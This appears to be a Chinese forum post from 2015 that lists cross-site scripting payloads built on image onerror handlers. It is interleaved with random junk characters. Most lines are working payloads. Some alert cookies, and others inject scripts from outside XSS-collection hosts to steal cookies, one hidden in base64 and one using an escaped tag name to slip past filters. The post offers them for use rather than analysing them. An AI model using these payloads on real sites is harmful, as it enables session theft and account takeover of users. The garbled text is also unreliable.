<img src='non-exist.jpg'onerror="alert('xss')">
* [5 N1 ?+ E1 t" d# Q<img src=# onerror=alert(123)>
& x2 r6 c; E- l) E* X+ k1 P<img src=# onerror=alert(document.cookie)>; M" r1 n! n; ^+ Q4 f# ]
下面是利用平台钓cookie的
- |- t; k6 {# }) }3 t' a <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>6 s5 X6 }0 r1 r/ R. q4 }
' S; s4 W: V5 I* f
# I0 T( R8 Y1 w( S8 `( T1 b0 M5 Z; m
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>% C i3 Z3 {7 X) V+ M/ k
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
& t# n) d$ k/ c+ f3 s8 a“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>% l( m% g, a+ [! x% `0 O
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
& x5 Q, Y/ x3 u1 x<img src="#">
+ U, S1 i( z U: c<img src="#">, P, \- k& n6 i. e- g
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
% R$ F, E# D( D+ D7 i3 p<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
, N' ?5 y' A" w! H1 A; t2 S<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>. I+ I8 [ D# V6 z1 \( [
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>0 E E: A/ O' `6 X" ^
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>. {6 ~% I3 _( k+ u. o9 r1 n! L- _
<img src=x width="0" height="0"></img>
5 D2 L+ n3 J: f& v* n<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))> w( x b% u+ @5 O9 o2 f1 h
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>4 f$ _! G# W9 f. d7 A) g7 m' [
|
发表于 2015-10-18 14:33:54
收藏
支持
反对